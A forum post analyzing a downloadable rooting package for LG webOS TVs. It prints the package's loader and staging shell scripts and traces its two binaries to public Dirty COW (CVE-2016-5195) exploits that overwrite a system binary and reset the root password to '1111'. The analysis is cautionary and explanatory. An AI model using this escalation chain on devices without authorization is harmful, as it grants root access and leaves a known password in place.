I've done an analysis of the root access method described at http://webos-forums.ru/topic4650.html ...
Disclaimer: I do not have a webOS TV and have not attemped or verified these steps.
There are 12 steps to the procedure:
Steps 1, 2 and 3 are all about setting up a developer account, installing a Developer Mode application on your device, enabling Dev Mode Status and Key Server switches, and gaining SSH developer access to your device.
Step 4 involves downloading a file from http://zalil.su/6937580 - you should be wary of downloading executables from random sites and executing them on your device.
Steps 5 through 7 detail how to get this file onto your device.
Steps 8 through 12 are running the script and getting the root shell.
So, let's look at things in more detail ...
The downloaded file is a shell script containing an embedded binary archive:
Code:
#!/bin/bash
uuencode=0
binary=1
match=$(grep -n '^PAYLOAD:$' $0 | cut -d ':' -f 1)
payload_start=$((match + 1))
if [[ $binary -ne 0 ]]; then
tail -n +$payload_start $0 | tar -xzvf - > /dev/null
fi
chmod +x *
./rt.sh
rm firstg
rm secstg
rm rt.sh
rm su
rm rep
exit 0
PAYLOAD:
<... lots of binary encoded data ...>
The way to extract the archive is to cut all of the data after the PAYLOAD: line, and insert it into a file with a .tar.gz extension.
Here is the contents of the archive:
Code:
$ tar ztvf ~/Downloads/6937580_root.tar.gz
drwxrwxrwx 0 root root 0 Jul 28 16:21 ./
-rwxrwxrwx 0 5482 5000 168 Jul 28 15:20 ./rep
-rwxrwxrwx 0 5482 5000 416 Jul 28 15:35 ./rt.sh
-rwxrwxrwx 0 5482 5000 39987 Jul 28 15:19 ./secstg
-rwxrwxrwx 0 5482 5000 11052 Jul 28 15:24 ./su
-rwxrwxrwx 0 5482 5000 16236 Jul 28 15:19 ./firstg
Let's look at each file individually:
- rt.sh - a shell script which sequences the rooting procedure
- firstg - a binary executable
- rep - a shell script which copies the su executable from /var/palm/jail/com.palm.devmode.openssh/media/developer/su to /dev/shm/test/su and changes ownership of the su executable to root
- secstg - a binary executable
- su - looks like the standard su program from busybox
Let's take a deeper look at rt.sh:
Code:
#!/bin/sh
echo "first stage"
./firstg /usr/bin/ApplicationInstallerUtility rep > /dev/null 2>&1
sleep 2
echo "second stage"
./secstg > /dev/null 2>&1
sleep 2
echo "third stage - "
echo "try install any app from market"
echo "wait..."
while [ ! -f /dev/shm/test/su ]
do
sleep 2
echo "try install any app from market"
done
sleep 1
echo "third stage ok"
echo "try get root - input password 1111"
/dev/shm/test/su
The firstg binary contains the following interesting strings:
Code:
usage: dirtyc0w target_file new_content
GCC: (crosstool-NG linaro-1.13.1+bzr2709 - Linaro GCC 2014.11) 4.9.3 20141031 (prerelease)
GNU C 4.9.3 20141031 (prerelease) -march=armv7-a -mfloat-abi=softfp -mfpu=vfpv3-d16 -mlittle-endian -mtune=cortex-a9 -mthumb -mtls-dialect=gnu -g -O2 -std=gnu99 -fgnu89-inline -fmerge-all-constants -frounding-math
/home/christopher/Development/linaro/.build/src/eglibc-linaro-2.19-2014.08/...
/home/christopher/Development/linaro/.build/src/gcc-linaro-4.9-2014.11/...
/home/evgen/dev/arm-linux-gnueabi-linaro_4.9.3-2014.11/...
crtstuff.c
dirtycow.c
elf-init.c
fstat.c
The dirtyc0w program name referenced in the usage string indicates that this is Dirty COW (CVE-2016-5195), a privilege escalation vulnerability in the Linux Kernel. See https://dirtycow.ninja/ for more details on Dirty Cow.
So firstg seems to be the canned exploit found at https://github.com/dirtycow/dirtycow...ter/dirtyc0w.c and the intent of the firstg call is to insert the contents of the rep script into the /usr/bin/ApplicationInstallerUtility binary.
So let's look at the rep script:
Code:
#!/bin/sh
mkdir /dev/shm/test
cp /var/palm/jail/com.palm.devmode.openssh/media/developer/su /dev/shm/test/
chown root:root /dev/shm/test/su
chmod u+s /dev/shm/test/su
This takes the su binary which was unpacked in the openssh jail /media/developer directory, and places it in /dev/shm/test/ with root privileges.
The secstg binary contains the following interesting strings:
Code:
$ strings secstg
/tmp/.ssh_bak
./.ssh_bak
root:
WejG7Q39pocco
sshd:
/etc/passwd
[-s] [-n] | [-h]
-s open directly a shell, if the exploit is successful;
-n combined with -s, doesn't restore the passwd file.
-h print this synopsis;
If no param is specified, the program modifies the passwd file and exits.
A copy of the passwd file will be create in the current directory as .ssh_bak
(unprivileged user), if no parameter or -n is specified.
Password overridden to:
1111
Root password is:
Enjoy! :-)
/home/tcwg-buildslave/workspace/tcwg-make-release/label/tcwg-x86_64-ex40/...
GNU C 4.9.4 20151028 (prerelease) -march=armv7-a -mtune=cortex-a9 -mfloat-abi=softfp -mfpu=vfpv3-d16 -mthumb -mtls-dialect=gnu -g -O2 -std=gnu99 -fgnu89-inline -fmerge-all-constants -frounding-math
/home/evgen/dev/toolchains/gcc-linaro-4.9-2016.02-x86_64_arm-linux-gnueabi/...
So secstg seems to be the canned exploit found at https://github.com/gbonacini/CVE-201...aster/dcow.cpp and the intent of the secstg call is to change the root password to "1111".
The rest of the rt.sh script then asks the user to install any application (which then causes the modified /usr/bin/ApplicationInstallerUtility binary to be called, which copies the su binary to a shared location accessible by the script, gives it root privileges and then executes it. The user then provides the new root password and is presented with a root shell.
-- Rod